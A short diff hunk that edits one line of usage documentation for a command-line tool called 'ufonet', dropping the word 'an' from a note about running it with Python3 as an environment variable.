@@ -31,7 +31,7 @@
 
  ufonet <options>
 
- 1: When Python3 is set as an environment variable:
+ 1: When Python3 is set as environment variable:
 
  ./ufonet <options>